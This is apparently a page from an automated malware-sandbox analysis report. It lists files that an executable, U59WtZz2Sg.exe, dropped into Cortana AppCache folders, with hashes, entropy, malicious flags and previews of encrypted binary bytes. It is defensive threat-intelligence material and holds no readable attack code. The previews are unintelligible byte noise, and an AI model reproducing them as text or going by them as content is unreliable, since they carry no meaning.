Preview:	./...!Z..ai.f......M.j....c..oagj`.{2.Cq....G>.o.}..."o&....D....j...S. .....sj..pH.....K^..J.x.HzP~...+...h.9_2..MC.I.......J.....I.....11.Q.>..@J}......U....,.L....9.%...q......[Z........X.:o8.j......W....ak....S._.n..A..pj-C..d&+GKXc..I.W...<n.&S.IAI..i<.OA...x~`u....d^K.......7.)C:..o'......S..."..w..j.......[..]mj..........bYD.....L..-X.b.8.9.dT9YS.m.h.......!./..G.........>..M.5....!..m\|G.S.'.A.k...]....v.hR/.E.....tlc{...ae..%^F.....~}L..O.Z...@6. .ls.>._.c.'+.v..Xu.$..(..v%.V#e....8.d.=6...Y.3Q...Rw.8M.;...<..#...~5qt.i+.Be->.....J..7Ek..^.,pFG.......G....2.5;.....sR...q0n...=..l...2?.g.......1....^..2.c..l.........e..zGp4..r)...SYoh....C5.H.....PPs.E.{.^/........\...t/..p.........u.n..M..&X#.\|.........a.z<Z\HX<...EL..P..kyc.(.._%..@..l.r..ck..7m...V.s....~.8.,.......yG(..c/z#6U#vj.e5.8p...\| .Ucno.]..$.VLI@.A..f<[..,.)....~.D.H@..Di..?."...2>#hR......].././\*...?.G.k[FJC......GV....8.;.u.{...9..qc..`..D.....0.E[......t..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_17[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	95157
Entropy (8bit):	7.998354195984551
Encrypted:	true
SSDEEP:	1536:nUGkojgEN0oBflKXLdM4BcpnJfl8MADSjY2gYX3uGwdQkAaK5d5pmRMpPX0hjM:/kojl0oNlIBcpJ5A2bX37gQ6K5dKKpYM
MD5:	93F42329C5590C4E4470B82DACF18CBE
SHA1:	0E81941BFDAF81678BCADACDC22D695700C514E9
SHA-256:	3B4749C23AF13065FAB55728535196F3E50512C24E70219BBEC172F43909C17F
SHA-512:	AB208BD6C3B5F08880BFD7C8E10F4D80E366FC084CA05BCBF2D3C71782C978D22B72F6E522B723D0C89A7706BB8BEBE0388ED573C0C133E5119F233523582843
Malicious:	true
Reputation:	unknown
Preview:	./..<..-o.w.x3.@....~..#).e.I...r^dQ.zI....:...?..95...0U.......P...I2.).;!wfQ.L.u......z.....m.I...6Q.._.b[.!.xT..<.Tz.F.!.._]...^.?B..!.m}.].?m-.K}........XS.m..uH..K.e...0.}......1...n...;n..6+..]..18.l..+?~...V.Q.H.}...L.'q..].bU..kQ8.>8d.....C&...ZeF...j.9.c....6........'...$7..K..@..-..-o;.....].J.G$.Q.'...[..?G.....p..\|.N.,.HS...c...H.=7`4tS..b.s.f".......Wq..X.g...%.z..ay..J.~..-....H...uc.\|..q_.Q..g....YL&.A._....QSI)....Z.D`..k...w...:.....s5.9!..j....TK7.iJ...R.2...c.(.>..U!...sGx&g.?Ds..b.....:D......i.....o....}.......X..(.......6s.U.......>.ke.K......[..F..S{.....t.R.)...V.Y...=}.a.L.c!...G......R;...x.....D...V..Q.@.w..>.....V..jM.%.$.XOyN......6q....S....~..]...V.."=.k.z..W.[#._..}.D..9D..7...4/.W.7.......p.C.p..........pQY..6._.i.}....\|.i<....:(}zo.......=.....lb#.K.s..3.....]..$p..+<z..{x4L.La......X].j....Me.y...c...=....q.QV'.&E...)D.PgT..`p~"t.z`...5B]d.X.a7x..w.^+.xjl..Y.c.%\...=....Wy.}.e.^Y..".Y ,.....'8.'.}.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_18[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	122091
Entropy (8bit):	7.9986592798672
Encrypted:	true
SSDEEP:	3072:N8s/JrCJWPt2YhW4sLFEKaVYw3YkFGRUCb+M/pq9WFa0xiCom:N8s/Jt0L2K/wokFU+M/pWia0xmm
MD5:	0D9D2B30C7F56D731456C82381A68AE9
SHA1:	D2BA9B4EB3B7C7400C19AFDA7B1F4C595228CCC9
SHA-256:	3D40F8984EAC89ABF9F1BC10375029440BDC952DC4120DC7C4069726391D5A2A
SHA-512:	8A8CE915D2442A59A7E51B18D97AAB3AB0FD0912A90A7E6B391EB7E9FDDE9D220D59F6FFECD40E506FA311E06A1FD9F90F4FE40ED83579A8293F71E38C517167
Malicious:	true
Reputation:	unknown
Preview:	./...z.=../....N.._9..s0.5u..]....q..'.t.]..X.n.v8.k,ePt....jj..:.G..m..K.z..w....).........t.r.+.;8..i...aP..p.uM.WB..#XH....t\.".u.&....._25...a5zX...w.I.o...`.....(aq....=%.4..d..03.b\|..q..8.....q.h..U.G..R x.S^........)..%.N...DB.]3.......,..t.....7.....s. ....M.....N2bHZTE.6..#.._uN^....q..W.3..,..".S.........m..u......1....V.Hh.hU.....v7.F..~....;.P.......ZM....N....ld^O.KJ..k4..)u.....8jG.5..[..%~[W..I.....E...R.yY....TW.L ..K&+][M...5@.I/[.D.\|...0....K_.......:8.".P.g...c.D"{. r[k...{~.3.)....Yu.'W.#9.ON.3..>..yp...OO.ib.......{...[.....k.0...sX..l.O.l..x.A...E@}.?.....F....2u.}..F'41.. {..~D.z....x.K..N.p..uS..eS\h.$..'.J7...d..3.D....Fr...S.r^... ..<...".....n./....5uZ;cs.kfw...+.o...%..^...tJ..Y.9.9....F...@.."........6...W.. ....^.lt...\|.!w@.......;............]}....'.._..5..^.>.,.~B&.].....6@n..\.....o;o.r...:$...&...x3.XB....c.Ru.G.p....#...O...K...o.F.....l...Q&.<.W./.7..qFkI....ViQ.;lg.g..&.@5<.k.......Z.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_19[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	53547
Entropy (8bit):	7.996764671996634
Encrypted:	true
SSDEEP:	1536:3emK9ExAALcw5hE0KJKeYH/TfGyyeew3amYfha:3eGx9cw3EFJKegL+yyeSjZa
MD5:	07459B4B1DF08059B3D8D350F99AB0F2
SHA1:	05BDBC8605FE7E465EFF66C8B1FA3F4235B85992
SHA-256:	0865D3C93CC16B079F59EF23E6288B51D1BE4149937B201F3BCBEDA898CE06BF
SHA-512:	365B349DA068FEA7BC75C3D6379D74E45F01A84D32D1D2D60BFA6E8B0B828874EC5723C8E3626377357FEFDFC53EB01476B765AD1329F700038F9503B92D18B1
Malicious:	true
Reputation:	unknown
Preview:	.@f,..e.....q..P..Y..S.P&....!.;S.....l.U[.....Vr}X..#S.H.n.-/._ ...`<2..lJ.p.F`.:..o..E.9'.....a!..}._L.\|......ey..I..2H?.....p.c.a...zE.BZ.....^.....Z.{..lZ....#..KO.yISQ.?p"..LH)Fr..^...!......'...-.Fb......R..ZyA....c. ].!...%.w.BT..G......T.J."..!y.m.@~cy....W..Q..a..a.%..zI.i...l..HK3.V.. l>.gf.u.#...^...p.o....>.U...L.f.k...4L.z.$4.-..%.....6Os.....9&....%.R.Y7V.k....4g.....i"}~.7...wunr\|.f.!..,..,._dt;A.{.&a\....A.K.T.Z...m.(.~..+f......!.W[@............fI.d..............,6..7!q...n2.w.B K._..C.M?..r...\|&...f../.E...;.E.VM.`...g..+....,4....o.M.:..)..4.r)...H..i..Y...f.........f...$./...g..6.....F..V..^..3....mS...o..2..^.....\|&iz..]..C....{k....4y.!...1w.P..\.F..j!.......X......DB.Q....`..... .Z.2..i-K/.k.."ko.d....\....-D...r....z.........../.D..h.)....S{..u.E..V........Q$Qh/..5..h.,.M...i.#X..}..\|K.:a......GVR..Nj..l..J.\|.Y...a.wXf.o.n~v{.(.H...e.......)..Y.r.")#I.f.....A...P.........J...\...8.S.'..P.G.+Y.]%.....,...

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_20[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	540730
Entropy (8bit):	7.100835689817174
Encrypted:	false
SSDEEP:	12288:qq1bJnzdRP87/PWbs9I6HsQnN82g5iPudwfgDvP3r:ZRRCuQnN6ie
MD5:	95C07D213594EC5DEE337E7C893CF04F
SHA1:	B7EE798917F72340CBDC8FD485B18AF556287EAA
SHA-256:	BF096BF04936ABB35854658345F14866A754240FF759B094A3E7AE1B83489A64
SHA-512:	356AC2EE47FDC9239C7190CEE3E92507044D4C57ED88B5F140EFCB8889827ADC8F1799C485042802ABCEC924E7911A0AC28AF819F3F4CD0A86AEC9C49A0F9A16
Malicious:	false
Reputation:	unknown
Preview:	.(f........7D<-...3Ge.uF..U.-....qs......s%..+GPn......g.V.;....H_.....Y.\M.=...Zb.P.ACg.^....p..j.}G..M.'..$..eDT.h=....0..Y..h..e..7]....".3x.x.j........6L._.......+.p..lC."..;.m?..>..xUn$...8..1$."....ME\...a.h..`..x.h.j$.....3.$>.M....l..<.UABl .\.9.k."......Ya..9Y.l....\.eF.x....\3..Y.[>m.\|...k:...bGd.zL....L..E..$.y.l..!...N.J....4`.B8........)...r@X...4...x..o R...g.?.....1k.....P.l..j>.@#.&.,b+Nl...X...K...tC.Jf{...-.k....i...-...r..(./.....)F...r...y.!...5B.../J...[P...M{.5..Apl^..........9..;E.5.Q<..N..-i...g.D....M...s..r..%u5".n!].........\|`.K....t.mtf>k..5...#...[ ...l.(.?...4...V.k.>p:.F<......z......TU.:.ZJ.....j...5U..~.....c.x.....F..v.a:.M1...R9..e X.JH........j.....{=u.m.V.W.N..1..[.$Uj..."...../ c......5.&...6........I@BD......b.....MPn0.....LuE.rNq.1.g.......WM..t..;8.z..u...G....+Cv.r....K...l.IN...B.w.hm.b1.XZ#V.J.....Qy..C.;t.ha~......K......i.g.9......K.'.X....K..d.~.Z.....3.e.Pg.T.Sy..7.p?...f{.r%..@>.nKU[.....58.iI

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_21[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	100863
Entropy (8bit):	7.998171149656411
Encrypted:	true
SSDEEP:	3072:2Dtj//Rc44voC+2ok1TQ1M1gwwM9OzH7p/:m/m44voMTJ1gwwM9Ozbh
MD5:	B2F94C3681E6F3448553A4EA098A506A
SHA1:	EF8C8CAC2920513A4D2240762657638982835925
SHA-256:	1EE7D69C78B8B468008BD6734B1D77B1449443A0AEB1679E658B7A0850C6ABD8
SHA-512:	BE8616A38AC6A84D7235464F6E67A06E06525B13A9617CA46A657357DEF9CA36DA3894D98A31AFEB29E53464CD127794B2061F67B69D2D9874191C55D8ED87AB
Malicious:	true
Reputation:	unknown
Preview:	.(f......U..GV..,.{.r.....P....eS..1S;..xE.Ee.(.....^d.Q:8..k!.o.e....l...9.y.[=.,$.O..".$.j/..Z~...;....7....9+....Q.e..CE.....Cq....T...?m.btF....f}J..{......=.Q{?L.S..{.8#?-H1Z.......t.5.t.2i.d.&<T.....;.N.G...-.....IB...3].#....P&...,".....n....`..U.k..C.U...I.,.Z..K.%..?..C..Qy]\n..q...FMcecbO9.VG}..wo....'.5{9.m..Kf..~..0...e....2...Z..dp.m!.i./.F.pyD].d..V..^.lt.....V...f.2.)"u7a...n.../.FO\|I...M..k.O.c...:..q...Ju.XB.q.-a..).;.a....)........J'.....Mq,....jJk...U5...=\..a../..Zh..U4....[.~e....G...^.iJ....;....B...5>.>.1Qv..8...{...ey.F&....!d.j....X<6bm..d:.I&o...7....T.._-...S.v.p....E..tI$.i....,.mX...3^@.5@..My.#.G6.^4.e....<U.s......Rp...\7a...k.'f..E.s..7.......g..0V C..>.....>h.......X....R......k.z&.1V.RMb.#...N]a.Ch.(.e.0......q.#...q.3.-..@.R..3.b7.pig....S..ui..{&....{W;q.(.."....*.. ..`...S.yKV...U..a%.b.....qe.W?QMY......H..L.%.G..I..,Y.J.R-q........w...bU..(>.....$z.....3%...fB.-.+.3C.4zb6.R..S.zO.XJD.a.....

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_22[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	24618
Entropy (8bit):	7.991551691162708
Encrypted:	true
SSDEEP:	384:F9gwG4QoNCdx3uCRNS2xtWoUi8VOFHvMeWzJS/g6QrUAEhR+VgPTj8EdhLa0hs:LMdxeCbS2xwQ84MNzEg6pt8sf8QA0hs
MD5:	C1DE161F9E859D32EBEACCF85CA6E591
SHA1:	5EF54B189BB0052D7C47289D9796CCCC93774A6E
SHA-256:	07A1D516B7D8A5851C59E45A3B3FEF8647E7A6B0E9FF7C8452DD8F74F15B01DF
SHA-512:	0E7D83D068BD98C75AF157CA79A5FBEE3BA42A5FA1939E390670E0B2F08310DF371A3F7447D847E15C192F291C4CCAB8669EDD130C6B9515778B785850523B53
Malicious:	true
Reputation:	unknown
Preview:	.(fE>.&.5....x......8.[8....>.g.(..c.\..tN);m.?.D.P%(.... .".l$.....nu^..90K9M....V..D.....n.v]B.I..5.>.f9Y.........1..T...G./5 ..(&....R.<.z......RQ%.j....H.&`a6.r...@.>Oj.h\[....j.+%c.....!.r.(...Ap...J...v...h0....7r}#..}....C.5P.......V.\.z...S....j./..O...[.=BS.6.#=jq.'..(H....~.S.............&.x.T.Sj..>@."]...w..Um+.y...V...`Ba.....S>s:.....9..I..7t...:c...D./..].n?......N..Xn....l.....}8....u).'Yb.#.8HJ...b2<e.b.U6..Cw......#.f..I/Gb.l..8.v...Hk>.m.Z=....-.....h...0!......p.lh..A.`....<.y.k.I..yvB.....I...=[......L...O.HA.Jj..#...n..Xn&.A..9..NlU<Ys.i....\|\.:.....m..q..{~......r........n..9fM..B.....8..il`UR.y.!!t7J....rs9Z....X!.....ZYL.Br.F.......$.D.D.BE..S..6AJ.u............G.....LeZ.,.-.U...Q '..._.Z..'...FM4]...Y..?.....w.... ).....D...............x.~..S.MB?..I...e.>-.#....,.5...x...)\|....{u.Fp......@.}i..E'.gZ3......@8../.5......\j.T&'.-.....$q.....~.3kM..B..b,C`..:..4....W..J).Q.w.b...A...}.pa~Bs...z.fp~..\|.-E..2c.f.R.N.Y..K*.h+V

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_23[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	132937
Entropy (8bit):	7.9986279330472225
Encrypted:	true
SSDEEP:	3072:3L0Od+PpAnk/iqT5TTHJHiGDr2zD5EzYZPDFdu3l5red:7GPqknT53HUGxgPDFd6l5q
MD5:	17AEEC7EF52DC09C2F083B4579AD45F3
SHA1:	185841987FAF9A7DF50B30A034593EBE0AEB0CFE
SHA-256:	D7352E5BBDE633A7D6486AEB00F17E3840CD899911DE753AE7B30ECA5F980B5D
SHA-512:	EE03265E4A44718271B5D7BC398EE31267925D3A93E05A884C07804611529C8A7D88B9D79ECEAD181DF5B322B588F9B769D112B4C3BDEBB549D7EBB8E7E45042
Malicious:	true
Reputation:	unknown
Preview:	.(fq..f;%.gx.'/`M..Rq.5u?.~.V.W..{#a.',..ve..6o.....[@ul.?~..E{.....1.M...M<...".J...H.\.k....<....7.3.s.s^..V...\.4.p..H.....i....7......@..`B..pD..y..Q<.{..y.F......-x..S.mB(.......\|.\........!.H.w....8.:.-6.;\|..a.....}...7u.t'..6Zf...n.5.m..d....v<\.y....B..V......vfWH.....Y.ks.#"2e.$...7;\.T.>^}.@.MY...h.+....P14...`9........-.l..+..k......#..k.5...(_cDR.....J.....GO.......vR..o.-..].^"...t..t.)>.Y.-}.V_..4....f78%"7..6d....!..s.B..S......HS..p.m~._.j^H8h.O.e..)[...'....\N&.."fXh....Q..b.^.....@.........g`y....pl.P......A3+M..................fn\|3N[..........a....1....l.`......47e..l.C..qv5.,lc....W`&>O..(.x...+..(....z@aO.S...`,......o.]nt..q.DO+@?D",<)v..y$E....E....d...Q....4.xD..H..."...`....1.q....I..+..... ..:...A..Y....h2\....!e....[..}....v=&/B}jg.O.&.q!y>....O.t..3..`...(@5.....[....z...;...qi9U..+...+..E..."...LDCnwGC..p!HHE._K....F...U..2...:V.@SJ.P/ mj.V?z.}...:.zq.{.5z5.......6......r..]..E%....n.d..)`...[..k@..-...a5.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_24[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	41543
Entropy (8bit):	7.995648629870221
Encrypted:	true
SSDEEP:	768:h4ex+tFGVXxaD0jvICENY4saWhHN3AnB3im5Thhm9f+:h4RtF4XZgBe4saWht3AVBhc+
MD5:	565834D75A4AAB421D3A6AFD53FB3A49
SHA1:	20F9947D213DA18BFC3F181A4BC75D8B2A7A28A1
SHA-256:	4B60ECBCCECC207E428BF6CDE61180E228ABD0D96C4030AE13F89E90BD82F639
SHA-512:	5A6E5EB058C322B3C07CEA819E570AFB5407E9B6BF29B3126C5C3B87BE95CF000E13001432F69DBBBB1AD0D3393BF2968BFEE04BD8BFCE91E7EE39AC45F959DA
Malicious:	true
Reputation:	unknown
Preview:	.#t....Xg.J.RI4&.&...SRM....:x.\.S.qK...q0...0.1...?.`.....I..u.......+..?.g..@....>;rh..j...c.3N"<y...;.X.Q.{....XM..fZj......B.N...B. ..e.l.s[..Cz.H^..:Ce.@+.......h.....zu-x...3`&.....v.9.%.>.E. .v....[].].....lk.;..tQ.M.9.u.............~<.L\|....\|...8.c....Q..6rB.;..F...Z...a}X..\|.U...r.R./I.%....3V.n..4-ck.f../.n...[\|....."....w~.U..6...[..P.....Lp...v......x...x. .go..A.6.C.]L.U.a..F.....+.D .;..f(Z.,..GO...}.T4......W..E..#..4.X.J.JM.'V..[....=d/.....<...);....L!....s.y..l....o..";..... ..:..s ......BX..<k....2..z..\|.%.EV..aD.t.%.,...+<.`..._..nTk.....#.K...b$.......,..........^\|....]h%.a.p.x./;.B Q.:.W...T...:..P)..0/c..j...x.K.U....9...n.25....Z..~.d.2N...O..I}NI..#.A.#tt.5...E...Z..'.,.....\|.)..n....T".M)..=...-...R......\|W...Pz...G@%o..6.s.b..N....pD?jFu.m...o.E.~t.&....C.l.Zq.y.n..P.Y.b..l..T.(.y#?....?..j.T.e..,V.K..d]........{..[W.-.....*.H.Db..t.3.q..J...j.....A...2.lk.t..v.}..K...\|....<0.J..M...l+"........

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_25[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	166392
Entropy (8bit):	7.973029377476482
Encrypted:	false
SSDEEP:	3072:Lo+ZHRl1QPOgsZdinyiqEMCeo0ngtKaFQfBoomp4qHnL+WDZuFTtI:LoYxlbgsmnrjMLDgHaBooGHL+tI
MD5:	ED69BC9DA359D656F5CF6EDA90805756
SHA1:	E1A8B08DC13C85669CC6242445D1C734C89BE0CC
SHA-256:	7C12839D00256E2CE3E762C8187710B13A2909B1527F81EFDE0DB8FB09644247
SHA-512:	B4AAEB3B015770701C17CFFEDCBC86008E43B46FE7F1F9FCCE29EF1E157ADD59857F97D709E1B9FA3ECD179F54B9DC6BE9D6B579ABD4C18CA3C3E40414307CA3
Malicious:	false
Reputation:	unknown
Preview:	.va....8>w.\|.yu..L4.=..T>....y.A.<.......y..6.w..S.DX.d..U..w8...be6,..Q... ...9..;8.A...^..L.8...jW..M0..c..]...I.%.....7...K..VG..C......S%k......L...y\|.PEfw....U....t.!]a.-Jf.H..7..KOyo..r"..L0..:.zq3...?jm.D..X...1........^.Wy.....=`..".G.....b....-..qDK..'.F..L...%i..z...w}./.L.!nz..=...i_Q....av=g!w.D2.7..g.P.k....dV6.Ij...C....B.Tm.D...(K...t......O.p.#.T. ...[k.a....c(..c;e.(f%...PR.t..!....../'..e.........G..+...T.$my<.S3...h.]...i.......m.F......-D..Lp....eB..s.#7C...m3.Y>....%..I..V"X..S..n.... .]...K.+-.....&-.x#RS.%.6}_J....}.`..I.,..k...~..Q.a.~.@I......oM=....A...S.t..3....X..l...r.Q.Js.."IG.(.Y....%....}..../d..3:..........\.DF.VN.R.i..ptY..."...._...z...LF.U.....y.g...d......x}.eu.....m\|:.v.z:......,..r....P.lJ.x.@......^..@.v.......%.TG9.p...L.x....7sp.l..\...l#e1y1.3hS....n>.u.~l.....q...<Y.Ny..KJ.....+....Q.'5(d:2.2.1yb.~6.........<.........u..J..S....AS)sO..FP......0[.P...(....s$.hj.mI{.....A..-.4.\.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_26[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	187642
Entropy (8bit):	7.878583349084274
Encrypted:	false
SSDEEP:	3072:zesJQ/xquGyVM+xu6OSXpYqBUtz/PbKc0IPfHr8ZmafNxqYVTVegCQantSfrCJxU:fQ/GM3OoYqO/iIHg/xqAan3HU
MD5:	15D249A99CB0E35329486F35C1EA1B31
SHA1:	7B5C84C3E7435D10FD7D1CE2C1FFF50CB3DBB55E
SHA-256:	37455F6917EE4B12500C2B259795980E08CC975AF7B19E236BA120F45E1F12ED
SHA-512:	DCCBE621E5E079D951FEDA64AD0FF36A57833F78FBC9EFB16DF9DBEE79F2FF45C46C21418F71079695C70F52A2A45DC2BB6111247788A4DD1F61A93BE2E66E24
Malicious:	false
Reputation:	unknown
Preview:	.va......!..}.[...5W;..../.i...}.{....F. O.g..CW..!.I].e..y....U..... (.j.r...10...J.m....A4..y.xq..H..Y..s%T..9EVuR....>.K...!.4..<S.L..94.....2qA.yf..U.~...rr...n..@T.7"k4...`!.....Xw..q...z..\|.V...D:_..gb.@5..:j..+...'...?.e.wL+.dk..^Y4.Mx...>....(o.(.Y..z,.QL..p..g."...^b>.%..(.s.K.za......;.yy,.4@.....P...\|.M^..).O..^.Fu...G...k..k.p..Rq&......ls.G.p.......l...f.M...T...3bo..`(9...d....i...w.L.J..Sz.:....Dx:.6.[....f}.3...(....kE....7{....Y......R.V.. ....5.q~..{..t.z....."...6.d4.j>/..I..].....z.'..N..5P..u....-........^...w.!.V.....F....l..%.y.AR.F.7..Y...}.7B......imj"..EG..7h..k...."h.%.../.J......._.....6......4./VH7{V%...SW}...5..]......=6.[...#...9..x..........v..=...S..m8X..K..G..qA.........gjaN..aH..,....^u..2...W<...]>MKW....3&.....<9....S@....Gez.L.,h1.....h..../.Bn.#..y........C......:.>o\....6....?..fk.2....?p.x.....X.....i4.9R.+{..a....w.%..Y.Wz.b1..!'..L.Qc.Q...n.?.6..v......i...{i...=.H..,z.z.z

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_27[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	31467
Entropy (8bit):	7.993658867650381
Encrypted:	true
SSDEEP:	768:+/ca4lUjtdxgCj9R4WvyZt+wXK+KPA80bCbc7sUEoWGXYsg:+/j7dDxejXNiyEP6YN
MD5:	47944B805B456F0A274B3820E1357792
SHA1:	5A01168FCC3E1D00FB5E861ACC9D4D5806AFB986
SHA-256:	1C0F1E169C0842BCBFA54CF59D630ED53530E67BC6EF585D4DBBB1203E520213
SHA-512:	73F3E4FE33503437790D7ED36A2673BB060E17F955DDC825AEDC09709979D67B354D36460D0ABF6D7CAC918673FEACC7BEFC75BC81DE497210B9EFF44202ED86
Malicious:	true
Reputation:	unknown
Preview:	.va..Xy..Q...W..D......!{....F..G......q..rD...k..~..:..{..H..5..q...RF.\|..d<9....[...,...'.........x.n2L.%.w.vRW...."...lK.M....t.Br.X..z7uf.nu.J.]#..L..Xa..m].b8.........(.IL6P%..d..7G...p.F.a;....\Z.-..n.8.Ud.}..~....1...:....i^.5.....\|../.J.t.%..;..?...!..tz...K.M....2c.#.r.......[.B5t.io.9P.L./s..n.i.-u.Z.........h...Zl...H.j....6D.%.......J.1mqp.7Q..e....=..-.{.....w~....{..M.!..[8........f2Bqh).~G.....d....n.$..6...Z%..~.e..fs.."..qI5q......d9......&D....B.E.b......L....4b..1....'....J.Nf9..i...(..p..b.]1.:'U. D.q........{..1..,.1+.0........c...Xc.......(5..........R.I.\|.-.yJr...=e.D.@......8.&..q..<.....DF.Y....F..V..]=e`....n...y{u.69....B{...u..?.".@M...j..IM.....JX.iX.^IO.&~.....BN9..q.o.v......X/..U.o.....X.3{I..a$.....z....._.'......}.D.......e.....!..j..!).zg....c.k..T.........r.....z,...F....%-......o(D?R.=.?...\|..&~...<n1.q..Q.p."....u.:v..m.....5...*@$.m.,.z.a........9....N.....S...kg.<.j..........#..g.2

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	56615
Entropy (8bit):	7.99662861073404
Encrypted:	true
SSDEEP:	1536:BzD/mYwAIc3xX74uUe1q/ekdsmTthYpCtA3MlIa8p8TzpbydV:BzCYwExDUOqWqVHUCua8p8JbydV
MD5:	B0C9A4CE996F31DFA56D21DBD184B9DC
SHA1:	D0817E85DA2E79B4D25C4F6CB6E72B585EA7BE05
SHA-256:	A87C85D91EC51F5347448BC93DC7A524AF0D2F273B15F0F21077EAA4511D852E
SHA-512:	40561592B1512EB1065D89E51DECDCF95FD8C68EAF3D40DAEF79CE708A96A9E33A51DD098963ECB02990E1272DFF6F7248DDFD9E9A016D282534D13F9BD7B4E1
Malicious:	true
Reputation:	unknown
Preview:	.<!H.y.....+G7h. ik~8......<.g~..5...'I...To....+..^z-.M....Y...W...nc.2....(..<C..D...#..]...../.).H..:....Y..W.o.;..-'.....s.E..Z..{K.....f)....@...r......^U5.~....~:....FA........vUQ./....n@>...o0u.x..)<....OL.?......3..6..Yq..2.v.0.K!...6..<..........<....)J.....!...&..V....).......!.$...o.........jw3...._....9n.,}cd`9.\|..rx..+Wv...$[......+T......R{..y.S.j...3./.....MX\|8..F.?.c..C{..Qn...?.X?...-.q.....t.o....W[.p.....+R..oe0.f5\[m/..U\u....}./Q..F..x.7.....[.l..U..{..f.....D..9..R.Dk.U.el_...k.....ik.~2B......?.k.W.}..i/&...\>$..f......]`x....TA..}.w.9...[..!Z>K.k...O.y.o..@...f..MS.].?....3...pS..9..K.Z.e.x..E..\|V.H...e...2...=N......ZC#.j.H........{....>...z.T.G.t.'.w...x.."...B.$...s..I.$\|.J"..m:....bU.1...Q.....o.aM...XKF\|..XC..\.B'R.....3...Q.Y...d.1..y.....&>".M...L.b>.P4B..)...Z...[v......\|...,...X.\|.........T.a..F`CA....m..a..^%.5t....rdA...'....<....d.V..e..\|0..T...9..F.(.l7..[[n....y...Ii[.P...>....\..j3..b.DY.W..r..n.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E5I42ZYH\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	50221
Entropy (8bit):	7.996360846844318
Encrypted:	true
SSDEEP:	1536:CcbipdLXm37k6uEHQe8g6i6TUbfJpyGU33TsvMTITHv:CjTiFfdT6inNEdMTP
MD5:	4EE25792AD18DAE246A8B4633328F4AD
SHA1:	30B90E05F43A732FEACC81D9ACCCDB3EBAA621F9
SHA-256:	75D08AC56340705A1DB532248159E75C5CC5DC0762847305E8638F8884E0E57A
SHA-512:	541FDB53B0CE5288A2D91B242F2FCD6C240F9D791CD303207D61FA0E36FEB558CBACD58E32A208A780C14D62E3B1EA9BC10CBECF43D91D75FD7161D42BC75C4C
Malicious:	true
Reputation:	unknown
